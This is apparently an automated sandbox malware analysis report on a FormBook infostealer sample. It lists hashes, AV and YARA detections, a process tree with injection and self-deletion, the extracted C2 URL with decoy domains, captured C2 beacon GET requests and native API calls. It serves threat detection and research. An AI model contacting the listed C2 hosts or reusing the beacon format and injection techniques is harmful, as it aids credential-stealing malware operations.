
Analysis Report 3.exe

Overview

General Information

Sample Name: 3.exe
Analysis ID: 433178
MD5: 21f077fa0e739f6174e2452abc30bb7c
SHA1: 9d60988db53eb662eb6a8e2f824036348f5e7ec0
SHA256: 6f536ae781fd98358126408aa6991b4bb3ec3f9940929a22b25f785b71ec770d
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 3.exe (PID: 5636 cmdline: 'C:\Users\user\Desktop\3.exe' MD5: 21F077FA0E739F6174E2452ABC30BB7C)
    • 3.exe (PID: 4364 cmdline: C:\Users\user\Desktop\3.exe MD5: 21F077FA0E739F6174E2452ABC30BB7C)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 2172 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 4880 cmdline: /c del 'C:\Users\user\Desktop\3.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4628 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4912 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.glocp9.com/ogpo/"], "decoy": ["ctluxurypropinternational.com", "mortgagenewsdailt.com", "diegofragnaud.info", "marthapollackesq.com", "thirtynightstay.com", "sschospitalbardoli.com", "plaquitasparamascota.com", "keochatluong.com", "420rankings.com", "westwoodstorageco.com", "valdobbiadeneinlove.com", "the427group.com", "cartercavanaugh.com", "ivvitaminsofarizona.com", "ummemunira.com", "amplifierconsulting.net", "spk-sakuranomiya.com", "anjanaonline.com", "kalibriya.com", "baincot.com", "mcintire2020.com", "janbosun.com", "briankingfineart.com", "erictailey.com", "shwanfan.com", "secretpal.club", "heatingandairtulsa.com", "hungthinhrealfintechhub.net", "dawnlodge.com", "indyoutlaws.com", "capitalpipework.com", "ngancali.com", "beconnectedby.com", "lindsaysgill.com", "mykidscast.com", "nosequemierda.com", "lightinemporium.com", "18tshortstore.com", "blakedroberts.com", "atlaschatbot.com", "healthchu.com", "aersous.info", "hanoinews.site", "studiodates.com", "gzgzdcd.com", "beeta-company.com", "mu-rain.com", "apalstyle.com", "lezbyfriends.com", "beerundead.com", "superb-mushroomcoffee.fyi", "pennydamspickups.com", "haircutbytin.com", "fulmarsolutions.com", "guoteng66.com", "plastictohydrogen.com", "dingarage.com", "elyernoson03ak2.xyz", "hayatatateyama.com", "templatejar.com", "catherinelazure.com", "ayco.sucks", "vigipharx.com", "devastateclo.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
1.0.3.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.0.3.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.3.exe.400000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
1.2.3.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.3.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Found malware configuration
Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: 3.exe | Virustotal: Detection: 58%
Source: 3.exe | Metadefender: Detection: 42%
Source: 3.exe | ReversingLabs: Detection: 75%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE
Source: 1.2.3.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: Binary string: ipconfig.pdb | source: 3.exe, 00000001.00000002.303221252.0000000000930000.00000040.00000001.sdmp
Source: Binary string: ipconfig.pdbGCTL | source: 3.exe, 00000001.00000002.303221252.0000000000930000.00000040.00000001.sdmp
Source: Binary string: MusNotifyIcon.pdb | source: explorer.exe, 00000005.00000000.276361272.000000000F707000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: 3.exe, 00000001.00000003.242702997.0000000000750000.00000004.00000001.sdmp, ipconfig.exe, 00000013.00000002.468141767.0000000002C9F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: 3.exe, ipconfig.exe
Source: Binary string: MusNotifyIcon.pdbGCTL | source: explorer.exe, 00000005.00000000.276361272.000000000F707000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.glocp9.com/ogpo/
Source: global traffic | HTTP traffic detected: GET /ogpo/?A48d=Eb/5YKKvhsVSjoe7WKqK8lvHUaW+cW6NCkYNvfPB2x3dLSCrEs0nDFeyqabSLZo4f9MA&6lR=6lV0 HTTP/1.1 Host: www.cartercavanaugh.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ogpo/?A48d=zC0kwP5bKctHlfLOB2+sibzcGKB3iMHeqEe/jIuGwpXwhXE0RzFo/zlZKctRC22ZSehm&6lR=6lV0 HTTP/1.1 Host: www.ayco.sucks Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ogpo/?A48d=/XqmpevXxgIJIxa5hFR8qIX06AkulEmPv+VC/TbkNW7S9I21kt2cK+1HkO47P92lOvxw&6lR=6lV0 HTTP/1.1 Host: www.vigipharx.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ogpo/?A48d=CbUJuKt7Vosrs6ZfvMy9ZACJtxh5Vn+1+a7oDBWZt+TgGm/ZX/AruvxTHNafm6iWRnNw&6lR=6lV0 HTTP/1.1 Host: www.plastictohydrogen.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ogpo/?A48d=Jl6F8JfRXKQuEgspHKEQWFx9lJkkJ81RWL0viny1sd20tPIEiWVj+so6v/m+sN8GJ3v/&6lR=6lV0 HTTP/1.1 Host: www.amplifierconsulting.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ogpo/?A48d=+lkBStlSiE9+OFshkPx+Yq+/zzAm/Md4bR1wj/5ry8M79budoFYJrIGh8Lqk2S+anP0V&6lR=6lV0 HTTP/1.1 Host: www.plaquitasparamascota.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 54.147.194.143
Source: Joe Sandbox View | IP Address: 81.17.18.198
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
Source: Joe Sandbox View | ASN Name: PLI-ASCH
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS traffic detected: queries for: cdn.discordapp.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Jun 2021 10:23:46 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.3.27 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=ab594f30faefbfad908548750f3c4e85; path=/ Vary: Host Data Raw: 36 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b<!DOCTYPE html><html><head><title>404 Not Found</title></head><body>404 Not Found</body></html>0
Source: explorer.exe, 00000005.00000003.293007696.000000000F6C3000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49716 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Windows\SysWOW64\ipconfig.exe | Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_004181B0 NtCreateFile,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00418260 NtReadFile,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_004182E0 NtClose,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00418390 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_004182DA NtClose,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_0041838A NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AEB040 NtSuspendThread,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9A10 NtQuerySection,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AEA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AEAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9560 NtWriteFile,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE96D0 NtCreateKey,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9650 NtQueryValueKey,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AEA710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9760 NtOpenProcess,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9770 NtSetInformationFile,
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AEA770 NtOpenThread,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE96E0 NtFreeVirtualMemory,LdrInitializeThunk,
